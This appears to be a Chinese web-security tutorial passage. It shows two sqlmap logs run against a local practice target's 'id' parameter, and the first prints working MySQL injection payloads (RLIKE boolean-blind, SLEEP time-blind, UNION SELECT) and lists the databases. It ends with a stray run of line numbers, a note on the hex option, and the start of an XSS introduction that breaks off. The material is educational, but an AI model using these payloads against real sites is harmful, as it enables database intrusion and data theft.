___
__H__
___ ___[
"]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:56:04 /2020-03-12/
[19:56:05] [INFO] testing connection to the target URL
[19:56:07] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:56:09] [INFO] testing if the target URL content is stable
[19:56:11] [INFO] target URL content is stable
[19:56:11] [INFO] testing if GET parameter 'id' is dynamic
[19:56:13] [INFO] GET parameter 'id' appears to be dynamic
[19:56:15] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[19:56:17] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[19:56:17] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[19:56:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:56:44] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:56:46] [WARNING] reflective value(s) found and filtering out
[19:56:48] [INFO] testing 'Generic inline queries'
[19:56:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[19:58:35] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:00:11] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[20:01:57] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:02:52] [INFO] GET parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --strin
g="Login")[20:02:52][INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'[20:02:54][INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'[20:02:56][INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'[20:02:58][INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'[20:03:00][INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'[20:03:02][INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'[20:03:04][INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'[20:03:06][INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'[20:03:08][INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'[20:03:10][INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'[20:03:12][INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'[20:03:14][INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'[20:03:16][INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'[20:03:18][INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'[20:03:20][INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'[20:03:22][INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'[20:03:24][INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[20:03:24][INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'[20:03:24][INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'[20:03:24][INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'[20:03:24][INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'[20:03:24][INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'[20:03:24][INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'[20:03:26][INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'[20:03:28][INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'[20:03:30][INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'[20:03:32][INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'[20:03:34][INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'[20:03:36][INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'[20:03:38][INFO] testing 'MySQL inline queries'[20:03:40][INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'[20:03:42][INFO] testing 'MySQL >= 5.0.12 stacked queries'[20:03:44][INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'[20:03:47][INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'[20:03:49][INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'[20:03:51][INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'[20:03:53][INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'[20:03:55][INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'[20:03:57][INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'[20:03:59][INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'[20:04:01][INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'[20:04:03][INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'[20:04:05][INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'[20:04:07][INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'[20:04:09][INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'[20:04:11][INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'[20:04:13][INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'[20:04:15][INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'[20:04:17][INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'[20:05:19][INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 RLIKE time-based blind' injectable
[20:05:19][INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[20:05:19][INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[20:05:19][INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:06:02][INFO] target URL appears to be UNION injectable with 3 columns
[20:06:16][INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 268 HTTP(s) requests:
---
Parameter: id(GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' RLIKE (SELECT (CASE WHEN (3231=3231) THEN 1 ELSE 0x28 END))-- JwBt
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: id=1' RLIKE SLEEP(5)-- TZbF
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: id=-6337' UNION ALL SELECT NULL,CONCAT(0x7178767871,0x635a545a4877775a7649456c7a576d4d4679465050687049475a41766e536161616375704570704c,0x716b
717871),NULL#
---
[20:06:18] [INFO] the back-end DBMS is MySQL
[20:06:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0.12
[20:06:28] [INFO] fetching database names
[20:06:30] [WARNING] the SQL query provided does not return any output
[20:06:30] [INFO] fetching number of databases
[20:06:30] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:06:30] [INFO] retrieved:
[20:06:36] [INFO] retrieved:
[20:06:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[20:06:42] [ERROR] unable to retrieve the number of databases
[20:06:42] [INFO] falling back to current database
[20:06:42] [INFO] fetching current database
available databases [1]:
[*] security
[20:06:44] [INFO] fetched data logged to text files under 'XXXX\sqlmap\output\127.0.0.1'
[*]
ending @ 20:06:44 /2020-03-12/
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'|.||___|_ [(]_|_|_|__,| _||_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user
's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:05:31 /2020-03-12/
[20:05:32] [INFO] testing connection to the target URL
[20:05:34] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:05:36] [INFO] testing if the target URL content is stable
[20:05:38] [INFO] target URL content is stable
[20:05:38] [INFO] testing if GET parameter 'id' is dynamic
[20:05:40] [INFO] GET parameter 'id' appears to be dynamic
[20:05:42] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:05:44] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:05:44] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[20:05:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:06:06] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:06:10] [INFO] testing 'Generic inline queries'
[20:06:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:08:04] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:08:06] [WARNING] reflective value(s) found and filtering out
[20:09:39] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[20:11:33] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:13:59] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:16:54] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:20:13] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:23:18] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:26:29] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[20:29:46] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:31:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[09:31:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[09:31:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[09:31:46] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[09:31:46] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[09:31:50] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[09:31:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:31:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:31:58] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:31:58] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:31:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[09:33:36] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[09:33:36] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:35:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:37:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:38:56] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:40:42] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:42:28] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:44:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:45:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:47:45] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:49:30] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:51:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:53:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:54:47] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:56:33] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[09:58:18] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[09:59:07] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:00:20] [INFO] testing 'MySQL >=
5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[10:00:22] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[10:00:24] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[10:00:27] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[10:00:29] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[10:00:31] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[10:00:33] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[10:00:37] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[10:00:41] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[10:00:45] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:00:49] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[10:00:53] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[10:00:57] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:01:01] [INFO] testing 'MySQL inline queries'
[10:01:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:01:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:03:09] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:03:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:05:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:06:04] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:07:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:09:09] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[10:10:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[10:12:34] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[10:14:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[10:15:20] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[10:16:27] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[10:17:34] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[10:18:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[10:20:27] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[10:22:07] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[10:23:16] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[10:24:25] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[10:26:05] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[10:27:12] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[10:28:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[10:29:59] [INFO] testing 'MySQL AND time-based blind (ELT)'
[10:31:45] [INFO] testing 'MySQL OR time-based blind (ELT)'
[10:33:24] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[10:34:31] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[10:35:38] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:36:51] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:37:34] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[10:37:36] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[10:37:38] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (
heavy queries)'
[10:37:40] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[10:37:42] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[10:37:44] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[10:37:46] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[10:37:50] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[10:37:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:38:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:40:08] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[10:42:06] [WARNING] GET parameter 'id' does not seem to be injectable
[10:42:06] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 10:42:06 /2020-03-13/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
说明:
有时候字符编码的问题,可能导致数据丢失,可以使用
hex参数
来避免。
二、XSS跨站脚本
1.XSS漏洞介绍
跨站脚本攻击(
Cross Site Scripting
):
为了不和层叠样式表(Cascading Style Sheets)的缩写混淆,故将跨站脚本攻击缩写为XSS。
恶意攻击者往web页面里插入恶意script代码,当用户浏览该页时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的。
攻击的简单过程如下: